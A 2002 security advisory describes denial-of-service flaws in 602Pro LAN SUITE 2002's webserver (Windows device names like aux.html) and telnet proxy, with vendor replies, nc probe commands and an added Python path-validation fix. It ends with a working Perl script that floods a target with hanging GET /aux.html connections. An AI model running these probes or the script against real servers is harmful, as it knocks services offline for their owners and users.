Date: August 3, 2002 (Updated August 20, 2002)
Author: Stan Bubrouski
Product: 602Pro LAN SUITE 2002
Version: 2002
Vendor: Software602, Inc.
Summary: Denial of Service attacks in webserver and telnet proxy
Updates:

Description:

There are two denial of service attacks in 602Pro LAN SUITE 2002 for Windows. The problems are described below. I've once again attached an exploit for the webserver DoS out of sheer frustration.

Problem 1: Webserver/Webmail Windows device name DoS attack

This problem is NOT FIXED. The person from Software602 who responded to my advisory completely lacks an understanding of how Windows devices work, and as a result this problem still affects about 50%+ of all their users (using Netcraft as a source).

Response from developer:

"1. AUX is filtered for a long time. AUX.HTML is not a problem because of the extension (no aux.html device exists)."

As you can see, the developer does not understand that on most Windows platforms aux.whatever or con.whatever is the same as AUX or CON respectively. To prove this I used a harmless method of testing this problem using sites listed on Netcraft as using Web602. Here is an example of a non-vulnerable host:

    $ printf "HEAD /aux.html HTTP/1.0\n\n" | nc www.[censored].com 80
    HTTP/1.1 404 The file requested was not found
    Server: WEB602/1.04
    Content-Type: text/html
    Content-Length: 111

Notice the Content-Length is 111; this is the length of the built-in 404 error message. BTW, using HEAD does not exhibit the problem, only using GET requests does. OK, now let's look at a vulnerable host:

    $ printf "HEAD /aux.html HTTP/1.0\n\n" | nc www.[censored].net 80
    HTTP/1.1 200 OK
    Server: WEB602/1.04
    Content-type: text/html
    Content-length: 0
    Connection: close

Notice the Content-Length is 0. If I were to send a GET request to that host requesting aux.html it would say Content-Length: 0 but the connection NEVER closes; it doesn't even time out.
Doing this repetitively, quickly and efficiently eats up memory and CPU which will not be released till the process is killed. This problem only seems to affect certain versions of Windows. Despite what the developers claim it is a problem, and I was able to find a couple hundred vulnerable hosts using the HEAD method I showed above. It seems to me, from the limited information I have from having people personally test this, that Win2k SP2/3 (EN) seems vulnerable and Windows XP apparently does not. As for other Windows OSs I can only speculate. Either it's the OS or a patch I do not have access to; either way there is something wrong.

Problem 2: The telnet proxy is vulnerable to a DoS attack

The telnet proxy allows connections to localhost, essentially allowing you to connect to the proxy through the proxy, without limit.

Response from developer:

"2. When You set up the IP filter (this is the only one correct way of using any proxy server!!!! no free service for anybody!!), then nobody else can not connect out through Your telnet proxy... Telnet proxy will be limited by Your notice. In "socksdll.ini" will be line "TelnetMax=xxx" (where "xxx" will be number of max connections)."

So in a new release this will be/is fixed.
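The filter the developer's response describes stops at the literal name "AUX", which is exactly the gap Problem 1 exploits. Below is an added example (written for this page, not code from the advisory or from Software602) of the check a web server running on Windows needs before it maps a URL path onto the filesystem: the reserved name is taken from the part of each segment before the first dot, case-insensitively, so aux.html, CON.whatever and LPT1.txt are all rejected along with the bare names. The function names and the percent-decoding step are this example's own assumptions.

```python
import re
from urllib.parse import unquote

# Names Windows reserves for devices. They are matched case-insensitively
# and regardless of extension, so "aux.html" names the AUX device.
_RESERVED = {"CON", "PRN", "AUX", "NUL"} | {
    f"{prefix}{n}" for prefix in ("COM", "LPT") for n in range(1, 10)
}


def names_windows_device(segment: str) -> bool:
    """True if a single path segment would resolve to a reserved device.

    Windows looks only at the name before the first dot (or colon, for a
    stream suffix), ignores case, and drops trailing spaces and dots, so
    AUX, aux.html and "AUX." all hit the same device.
    """
    stem = re.split(r"[.:]", segment, maxsplit=1)[0].rstrip(" .")
    return stem.upper() in _RESERVED


def is_safe_request_path(url_path: str) -> bool:
    """Vet every segment of a request path before touching the filesystem.

    Percent-encoding is decoded first so "/%61ux.html" is caught too, and
    ".." segments are refused so the device check cannot be stepped around.
    Returns True only when no segment can name a device or leave the root.
    """
    decoded = unquote(url_path.split("?", 1)[0])
    for segment in decoded.replace("\\", "/").split("/"):
        if not segment:
            continue
        if segment == "..":
            return False
        if names_windows_device(segment):
            return False
    return True
```

A server that applies is_safe_request_path before opening the file answers the advisory's GET /aux.html with a 404 instead of handing the request to the AUX device.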
#!/usr/bin/perl
#
# lansuite-webserver-DoS.pl - 602Pro LAN SUITE 2002 webserver DoS
#
# Note: Try using a connections setting of 100000+ for obvious results
#
# Date: August 3, 2002
# Author: Stan Bubrouski (stan@ccs.neu.edu)

use IO::Socket;

if (!$ARGV[2]) {
    print "Usage $0 <hostname> <port> <connections>\n\n";
    exit();
}

$host = $ARGV[0];
$port = $ARGV[1];
$numc = $ARGV[2];

# Open a fresh connection each iteration and send a GET for the Windows
# device name; $sock is reassigned on the next pass.
foreach (1..$numc) {
    $sock = IO::Socket::INET->new(
        PeerAddr => "$host",
        Proto    => "tcp",
        PeerPort => "$port");
    # Skip this pass if the connect failed instead of dying on an undef handle.
    next unless $sock;
    print $sock "GET /aux.html HTTP/1.0\r\n";
}